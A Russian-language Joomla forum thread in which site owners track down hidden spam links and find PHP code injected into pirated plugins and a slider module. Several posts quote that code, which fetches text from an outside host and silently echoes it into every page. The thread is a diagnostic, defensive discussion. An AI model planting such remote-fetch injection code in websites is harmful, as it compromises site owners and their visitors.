Реклама в шаблоне

0 Пользователей и 1 Гость просматривают эту тему.
  • 44 Ответов
  • 2296 Просмотров
*

sibdes

  • Осваиваюсь на форуме
  • ***
  • 72
  • 0
  • Никогда не бойся делать то, что ты не умеешь.
Реклама в шаблоне
« : 19.02.2016, 10:58:06 »
Не могу найти и убрать рекламу из кода сайта. Что примечательно, на сайте ее не видно. но в коде есть, что не есть хорошо. Сайт кулиш16.рф.
Реклама в позиции модуля headermodule1.
Код
<div style="position: absolute; top: -1000px;">
<a href="http://fortstroi.com.ua/stroitelstvo/video/video/otdelka-potolka-v-vannoj-komnate-pvkh-panelyami">Отделка потолка в ванной</a><br>
<a href="http://kamael.com.ua/1/sovety-avtomobilistam/327-inzhektor-ili-karbyurator-chto-luchshe">Что лучше инжектор или карбюратор?</a>
</div>

сперва грешил на плагин Fancy Scroll Top, так как у него та же позиция, но поковыряв его ничего подозрительного не нашел.

*

sibdes

  • Осваиваюсь на форуме
  • ***
  • 72
  • 0
  • Никогда не бойся делать то, что ты не умеешь.
Re: Реклама в шаблоне
« Ответ #1 : 19.02.2016, 11:03:04 »
поиск через beget ничего не дал. что странно. сам шаблон тоже проверил. в частности index.php, head_includes.php

*

SeBun

  • Практически профи
  • *******
  • 3081
  • 187
  • @SeBun48
Re: Реклама в шаблоне
« Ответ #2 : 19.02.2016, 11:03:57 »
Обычно это прописано в шаблоне или фреймворке. Не удаляйте, это стандартная плата за использование вареза. Если жить мешает - качайте Joomla с официального сайта joomla.org, то же касается шаблона и расширений. У вас там помимо этих ссылок еще много чего найти можно, если поискать...

Как удалить? Берите программу TotalCommander, Notepad++ и др. и делайте поиск по файлам. Если не найдете прямым текстом, ищите конструкции base64, особенно eval(base64()). Так же код может быть и в яваскриптах и...да где угодно. А может и через шелл заливают ссылочки...
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Администрирование | Разработка
Ник занят

*

sibdes

  • Осваиваюсь на форуме
  • ***
  • 72
  • 0
  • Никогда не бойся делать то, что ты не умеешь.
Re: Реклама в шаблоне
« Ответ #3 : 19.02.2016, 11:11:43 »
Цитировать
Обычно это прописано в шаблоне или фреймворке. Не удаляйте, это стандартная плата за использование вареза. Если жить мешает - качайте Joomla с официального сайта Joomla.org, то же касается шаблона и расширений. У вас там помимо этих ссылок еще много чего найти можно, если поискать...

Как удалить? Берите программу TotalCommander, Notepad++ и др. и делайте поиск по файлам. Если не найдете прямым текстом, ищите конструкции base64, особенно eval(base64()). Так же код может быть и в яваскриптах и...да где угодно. А может и через шелл заливают ссылочки...
Пока не мешает. Нигде не торчит. Поживет пока, но как руки дойдут удалю однако. Спасибо. Сдается мне что это шелл, но может и по id идет подстановка ссылок (может поэтому поиск по словам ничего не дал?).


*

SeBun

  • Практически профи
  • *******
  • 3081
  • 187
  • @SeBun48
Re: Реклама в шаблоне
« Ответ #5 : 19.02.2016, 11:21:09 »
может и по id идет подстановка ссылок (может поэтому поиск по словам ничего не дал?).
Это как? ))

Оказываю услуги по Joomla | Миграция на Joomla 3.x | Администрирование | Разработка
Ник занят

*

voland

  • Профи
  • ********
  • 9379
  • 421
  • Эта строка съедает место на вашем мониторе
Re: Реклама в шаблоне
« Ответ #6 : 19.02.2016, 11:24:32 »
Сдается мне что это шелл
Пока не мешает.
Поживет пока
Такие дела

*

SeBun

  • Практически профи
  • *******
  • 3081
  • 187
  • @SeBun48
Re: Реклама в шаблоне
« Ответ #7 : 19.02.2016, 11:29:30 »
как руки дойдут удалю однако...
Такие дела...
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Администрирование | Разработка
Ник занят

*

sibdes

  • Осваиваюсь на форуме
  • ***
  • 72
  • 0
  • Никогда не бойся делать то, что ты не умеешь.
Re: Реклама в шаблоне
« Ответ #8 : 20.02.2016, 07:28:30 »
Цитировать
Это как? ))
как пример приведу слайдер: на сайте в исходном коде у него CSS такой:
Код
#djslider167 {
margin: 0 auto;
position: relative;
height: 80px;
width: 1255px;
max-width: 1255px;
}

в самих файлах слайдера код такой:
Код
#djslider'.$mid.' {
margin: 0 auto;
position: relative;
height: '.$slider_height.'px;
width: '.$slider_width.'px;
max-width: '.$slider_width.'px;

id значения заменяются реальными . то есть искать в файлах на сервере слово djslider167 бесполезно. но этому объяснение есть. значения в настройках и ставятся. а ссылки... фиг знает где сидят. можно ли как то посмотреть код позиции модуля в файле каком?

Цитировать
При смене шаблона пропадает?
на стандартных в коде чисто. allrounder значит виноват.


*

KKAAZZOO

  • Практически профи
  • *******
  • 2138
  • 102
Re: Реклама в шаблоне
« Ответ #10 : 20.02.2016, 11:36:58 »
Умудриться скачать изначально бесплатный шаблон с варезника это надо суметь
« Последнее редактирование: 20.02.2016, 21:21:27 от KKAAZZOO »

*

AlekVolsk

  • Профи
  • ********
  • 6301
  • 336
Re: Реклама в шаблоне
« Ответ #11 : 20.02.2016, 13:31:37 »
это перл  ;D

*

sibdes

  • Осваиваюсь на форуме
  • ***
  • 72
  • 0
  • Никогда не бойся делать то, что ты не умеешь.
Re: Реклама в шаблоне
« Ответ #12 : 20.02.2016, 20:56:39 »
Цитировать
Ну вот ) В шаблоне найти дело 5 минут.
на серваке есть поиск по словам в файле, по нему не получилось найти( как еще можно?

*

dmitry_stas

  • Профи
  • ********
  • 9667
  • 931
Re: Реклама в шаблоне
« Ответ #13 : 20.02.2016, 21:18:57 »
может шаблон все таки скачать с официального сайта? тем более что он, как я понял, бесплатный.
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций

*

KKAAZZOO

  • Практически профи
  • *******
  • 2138
  • 102

*

BoreS

  • Новичок
  • *
  • 3
  • 0
Re: Реклама в шаблоне
« Ответ #15 : 20.02.2016, 21:21:44 »
Та же ситуация. При чёмъ тема купленная несколько летъ назадъ у создателей. Кодъ появился недавно, какъ я понялъ, раньше такого не было. Вареза не ставилъ въ последнее время. Решилъ проблему отключениемъ исходящего трафика съ сайта въ панели хостера, что наводитъ на мысль, что это можетъ быть шеллъ. Проблема решена какъ бы, но это костыль, а не лечение. Изъ блокировки трафика пересталъ работать Social Backlinks, что понятно. Поискъ по словамъ и base64 ничего не далъ. Помогите советомъ.
сайт megaten.ru
Сейчасъ на нёмъ нетъ этихъ ссылокъ, но если включить исходящий трафикъ, они снова появляются :(

*

KKAAZZOO

  • Практически профи
  • *******
  • 2138
  • 102
Re: Реклама в шаблоне
« Ответ #16 : 20.02.2016, 21:25:55 »
Несколько лет назад это до революции, судя по вашему слогу, сударь? Создайте новую тему для своего вопроса и не забывайте что здесь нужно писать на современном русском языке

*

BoreS

  • Новичок
  • *
  • 3
  • 0
Re: Реклама в шаблоне
« Ответ #17 : 20.02.2016, 21:39:44 »
Зачем создавать новую тему, если вопрос тот же самый? те же самые ссылки, значит тот же самый код. Смысл плодить новые темы?

*

SeBun

  • Практически профи
  • *******
  • 3081
  • 187
  • @SeBun48
Re: Реклама в шаблоне
« Ответ #18 : 21.02.2016, 18:35:53 »
Зачем создавать новую тему, если вопрос тот же самый? те же самые ссылки, значит тот же самый код. Смысл плодить новые темы?

Затем, что выше вы написали:

Вареза не ставилъ въ последнее время

Посему вывод - ваш сайт заражен, как и сайт ТС. Только ТС пытается бороться со ссылками, которые у него вылезают, а у вас уже явные признаки проникновения. Так что этот вопрос решайте индивидуально, лучше всего в коммерческом разделе.
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Администрирование | Разработка
Ник занят

*

sibdes

  • Осваиваюсь на форуме
  • ***
  • 72
  • 0
  • Никогда не бойся делать то, что ты не умеешь.
Re: Реклама в шаблоне
« Ответ #19 : 22.02.2016, 10:18:08 »
Цитировать
может шаблон все таки скачать с официального сайта? тем более что он, как я понял, бесплатный.

менять шаблон не вариант, т.к. много изменений было внесено в текущий шаблон. CSS конечно можно перенести, но и только. сейчас уже думаю что дело в каком нибудь компоненте или плагине. но опять же почему поиск по ключ. словам ничего не дает? на хостинге от бегета есть довольно таки полезная функция как поиск в файле определенного слова. раньше всегда находил.

*

Taatshi

  • Support Team
  • *****
  • 4782
  • 452
Re: Реклама в шаблоне
« Ответ #20 : 22.02.2016, 11:12:15 »
Потому что может подгружаться скриптами - фиг Вы тогда в шаблоне что-то найдете - хоть в base, хоть в eval
ВЕРСТКА, САЙТЫ ПОД КЛЮЧ, УДАЛЕНИЕ ВИРУСОВ, МИГРАЦИЯ НА JOOMLA 3  /  ОТЗЫВЫ 
Минимальная ставка за платные услуги 1000 рэ Связь: telegram - Taatshi, почта - Taatshi на яндексе.

*

dmitry_stas

  • Профи
  • ********
  • 9667
  • 931
Re: Реклама в шаблоне
« Ответ #21 : 22.02.2016, 12:36:16 »
менять шаблон не вариант
та хотя бы на время, чтобы понять ссылки будут или нет. они же сразу видны будут? вот и переключить на заведомо чистый шаблон, и посмотреть.
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций

*

sibdes

  • Осваиваюсь на форуме
  • ***
  • 72
  • 0
  • Никогда не бойся делать то, что ты не умеешь.
Re: Реклама в шаблоне
« Ответ #22 : 22.02.2016, 14:27:36 »
Цитировать
та хотя бы на время, чтобы понять ссылки будут или нет. они же сразу видны будут? вот и переключить на заведомо чистый шаблон, и посмотреть.
а если проблема в компоненте каком или плагине? они ведь независимо от шаблона подгружаются? попробую может и правда шаблон кривой.

*

dmitry_stas

  • Профи
  • ********
  • 9667
  • 931
Re: Реклама в шаблоне
« Ответ #23 : 22.02.2016, 14:34:35 »
Цитировать
а если проблема в компоненте каком или плагине?
та все может быть, я ж не против. но для начала хотя бы исключить версию с шаблоном, тем более происхождение шаблона непонятно.
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций

*

SeBun

  • Практически профи
  • *******
  • 3081
  • 187
  • @SeBun48
Re: Реклама в шаблоне
« Ответ #24 : 22.02.2016, 15:08:33 »
Похоже, ТС проще выстрелить себе в ногу...  ;D
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Администрирование | Разработка
Ник занят

*

sibdes

  • Осваиваюсь на форуме
  • ***
  • 72
  • 0
  • Никогда не бойся делать то, что ты не умеешь.
Re: Реклама в шаблоне
« Ответ #25 : 25.02.2016, 06:32:23 »
шаблон сменил. ссылки остались.(

*

BoreS

  • Новичок
  • *
  • 3
  • 0
Re: Реклама в шаблоне
« Ответ #26 : 27.02.2016, 02:35:38 »
В общем, нашёл я эту гадость. И была эта штука в плагине extranews для Joomla 2.5. Видать где-то я скачал у недобросовестного человека. И этот человек вставил вот такой код в файлик plugins/content/plg_extranews/plg_extranews.php Ниже привожу этот код. может кому пригодится для поиска этой дряни у себя на сайте.
Код
$files = 'http://atempl.com/10.txt';  
$file_headers = @get_headers($files); 
if($file_headers[0] == 'HTTP/1.1 200 OK')
 { 
       $content = file("http://atempl.com/10.txt");
       $data = implode($content);
       echo $data;
 } 

*

dmitry_stas

  • Профи
  • ********
  • 9667
  • 931
Re: Реклама в шаблоне
« Ответ #27 : 27.02.2016, 11:48:30 »
хорошо что только такое вставили, а не чего то пострашнее...
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций

*

sibdes

  • Осваиваюсь на форуме
  • ***
  • 72
  • 0
  • Никогда не бойся делать то, что ты не умеешь.
Re: Реклама в шаблоне
« Ответ #28 : 28.02.2016, 11:50:50 »
Урря! Зараза найдена.
вот код
Код
<?php
$files = 'http://atempl.com/5.txt';  
$file_headers = @get_headers($files);  
if($file_headers[0] == 'HTTP/1.1 200 OK')
 {  
$url = "http://atempl.com/5.txt";
$content = @file_get_contents($url);
$data = implode($content);
 echo $data; }  
?>

вот место: /plugins/content/jclock/jclock.php
Благодарю всех кто помогал. Отдельно выражаю благодарность BoreS.

*

sibdes

  • Осваиваюсь на форуме
  • ***
  • 72
  • 0
  • Никогда не бойся делать то, что ты не умеешь.
Re: Реклама в шаблоне
« Ответ #29 : 28.02.2016, 11:55:03 »
Зараза найдена даже в двух местах:
Код
<?php
$files = 'http://atempl.com/10.txt';
$file_headers = @get_headers($files);
if($file_headers[0] == 'HTTP/1.1 200 OK')
 {
$url = "http://atempl.com/10.txt";
$c = @file_get_contents($url);
$array_double=explode(',',$c);
$array_one=array_unique($array_double);
$result=implode(',',$array_one);
echo $result;
 }
?>
по адресу /modules/mod_djimageslider/tmpl/default.php